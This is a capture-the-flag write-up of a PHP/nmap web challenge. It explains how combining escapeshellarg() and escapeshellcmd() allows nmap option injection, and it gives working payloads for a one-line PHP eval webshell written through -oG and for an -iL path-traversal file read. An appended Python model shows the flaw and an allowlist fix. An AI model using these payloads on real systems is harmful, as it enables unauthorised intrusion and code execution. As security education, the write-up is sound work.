2020 WANGDING cup_ Rosefinch formation_ Web_ nmap
2022-07-06 11:32:00 【Her&mes】
Writeup (WP)
Two points are tested
1. Use of nmap
2. The vulnerability caused by mixing escapeshellarg() and escapeshellcmd()
The first one is easy; the title gives it away.
The second point I did not know, and I don't know where I was supposed to get it from; I was stumped.
Other writeups I read referred to [BUUCTF 2018]Online Tool, a code-audit challenge that tells you directly that the parameter is processed by escapeshellarg() and escapeshellcmd().
I would not call the two challenges alike; they are exactly the same.
nmap output-related options
The following can be found on the nmap Chinese site:
-oN (normal output)
-oX (XML output)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep output)
-oA (output to all formats)
There are other miscellaneous output options that you can look up; here -oG is used to construct the payload.
The body of the payload is
<?php @eval($_POST["hack"]);?> -oG hack.php
However, after sending it, the page echoes back the word "hacker".
There is a filter, so fuzz it: php is filtered, but phtml is not, and PHP's short tag can replace <?php, that is:
<?= @eval($_POST["hack"]);?> -oG hack.phtml
That is still not enough: after this payload is processed by escapeshellarg() and escapeshellcmd(), the file is not generated.
The solution is simple: add spaces and single quotes, which produces a PHP file that parses normally.
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
The underlying principle is explained in another author's article on PHP escapeshellarg()+escapeshellcmd().
On CSDN there are also other authors' analyses of escapeshellarg() and escapeshellcmd(), which are easy to follow.
Besides writing a webshell, there is also a direct file-read method that uses the -iL parameter:
' -iL ../../../../flag -o a '
Then simply access a. The following also works, but the file to access is a'
' -iL ../../../../flag -o a
The reason is also those two functions .
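Added example, not part of the original writeup: a Python model of how PHP's escapeshellarg() and escapeshellcmd() behave on Unix, run over constructed inputs with a harmless file name. It shows how mixing the two splits one quoted argument into several argv words, and why the variant without the trailing quote leaves a ' on the file name. The "nmap -F" command line, the function names and the is_scan_target allowlist are assumptions for illustration.

```python
import re
import shlex

# Model of PHP on Unix, not PHP itself. Metacharacters escapeshellcmd() escapes
# (byte 0xFF is left out of this model).
CMD_META = set("#&;`|*?~<>^()[]{}$\\\n")

def escapeshellarg(arg):
    # Wrap in single quotes; each ' becomes '\'' (close, escaped quote, reopen).
    return "'" + arg.replace("'", "'\\''") + "'"

def escapeshellcmd(cmd):
    out, pending = [], None              # pending: quote character currently open
    for i, ch in enumerate(cmd):
        if ch in "'\"":
            if pending is None and ch in cmd[i + 1:]:
                pending = ch             # opens a pair: left as is
            elif pending == ch:
                pending = None           # closes the pair: left as is
            else:
                out.append("\\")         # unpaired quote: backslash-escaped
        elif ch in CMD_META:
            out.append("\\")             # this also hits the \ made by escapeshellarg
        out.append(ch)
    return "".join(out)

def argv_mixed(user_input):
    # Pattern from the writeup: escapeshellarg() output run through escapeshellcmd().
    return shlex.split(escapeshellcmd("nmap -F " + escapeshellarg(user_input)))

def argv_arg_only(user_input):
    # escapeshellarg() alone: the input stays one argv word.
    return shlex.split("nmap -F " + escapeshellarg(user_input))

def is_scan_target(user_input):
    # Allowlist (assumed policy): hostname or IPv4 characters only, no leading '-',
    # because even a single well-quoted word can still be read as an option.
    return re.fullmatch(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?", user_input) is not None

if __name__ == "__main__":
    for sample in ("127.0.0.1", "' -oG scan.txt '", "' -oG scan.txt"):  # constructed
        print(repr(sample), is_scan_target(sample))
        print("  mixed   :", argv_mixed(sample))
        print("  arg only:", argv_arg_only(sample))
```

In the mixed case the backslash that escapeshellarg() inserted is itself escaped, so the quotes around it pair up as empty strings and the rest of the input reaches nmap as separate options; rejecting the input with the allowlist before any command is built removes the problem at its source.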